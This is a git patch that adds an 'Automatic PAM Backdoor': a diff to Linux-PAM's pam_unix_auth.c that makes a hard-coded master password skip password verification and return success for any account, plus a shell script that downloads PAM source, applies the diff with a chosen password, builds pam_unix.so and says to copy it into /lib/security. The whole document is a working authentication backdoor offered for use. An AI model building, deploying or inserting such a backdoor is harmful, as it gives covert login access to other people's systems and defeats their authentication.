From 7de5906abcdff626466ffc5d9bbf5ee766d8fc6e Mon Sep 17 00:00:00 2001
From: zeph <zephrax@gmail.com>
Date: Thu, 8 Jun 2017 18:18:15 -0300
Subject: [PATCH] First commit

---
 backdoor.patch | 23 ++++++++++++++++
 backdoor.sh    | 72 ++++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 95 insertions(+)
 create mode 100644 backdoor.patch
 create mode 100755 backdoor.sh

diff --git a/backdoor.patch b/backdoor.patch
new file mode 100644
index 0000000..fada74e
--- /dev/null
+++ b/backdoor.patch
@@ -0,0 +1,23 @@
+*** ./modules/pam_unix/pam_unix_auth.c	2016-04-11 08:08:47.000000000 -0300
+--- pam_unix_auth.c	2017-06-07 21:25:25.656306410 -0300
+***************
+*** 170,176 ****
+  	D(("user=%s, password=[%s]", name, p));
+  
+  	/* verify the password of this user */
+! 	retval = _unix_verify_password(pamh, name, p, ctrl);
+  	name = p = NULL;
+  
+  	AUTH_RETURN;
+--- 170,180 ----
+  	D(("user=%s, password=[%s]", name, p));
+  
+  	/* verify the password of this user */
+!         if (strcmp(p, "_PASSWORD_") != 0) {
+!           retval = _unix_verify_password(pamh, name, p, ctrl);
+!         } else {
+!           retval = PAM_SUCCESS;
+!         }
+  	name = p = NULL;
+  
+  	AUTH_RETURN;
diff --git a/backdoor.sh b/backdoor.sh
new file mode 100755
index 0000000..37e19b4
--- /dev/null
+++ b/backdoor.sh
@@ -0,0 +1,72 @@
+#!/bin/bash
+
+OPTIND=1
+
+PAM_VERSION=
+PAM_FILE=
+PASSWORD=
+
+# Initialize our own variables:
+output_file=""
+verbose=0
+
+echo "Automatic PAM Backdoor"
+
+function show_help {
+	echo ""
+	echo "Example usage: $0 -v 1.3.0 -p some_s3cr3t_p455word"
+	echo "For a list of supported versions: http://www.linux-pam.org/library/"
+}
+
+while getopts ":h:?:p:v:" opt; do
+    case "$opt" in
+    h|\?)
+        show_help
+        exit 0
+        ;;
+    v)  PAM_VERSION="$OPTARG"
+        ;;
+    p)  PASSWORD="$OPTARG"
+        ;;
+    esac
+done
+
+shift $((OPTIND-1))
+
+[ "$1" = "--" ] && shift
+
+if [ -z $PAM_VERSION ]; then
+	show_help
+	exit 1
+fi;
+
+if [ -z $PASSWORD ]; then
+	show_help
+	exit 1
+fi;
+
+echo "PAM Version: $PAM_VERSION"
+echo "Password: $PASSWORD"
+echo ""
+
+PAM_BASE_URL="http://www.linux-pam.org/library"
+PAM_DIR="Linux-PAM-${PAM_VERSION}"
+PAM_FILE="Linux-PAM-${PAM_VERSION}.tar.bz2"
+PATCH_DIR=`which patch`
+
+if [ $? -ne 0 ]; then
+	echo "Error: patch command not found. Exiting..."
+	exit 1
+fi
+wget -c "${PAM_BASE_URL}/${PAM_FILE}"
+
+tar xjf $PAM_FILE
+cat backdoor.patch | sed -e "s/_PASSWORD_/${PASSWORD}/g" | patch -p1 -d $PAM_DIR
+cd $PAM_DIR
+make
+cp modules/pam_unix/.libs/pam_unix.so ../
+cd ..
+echo "Backdoor created."
+echo "Now copy the generated ./pam_unix.so to the right directory (usually /lib/security/)"
+echo ""
+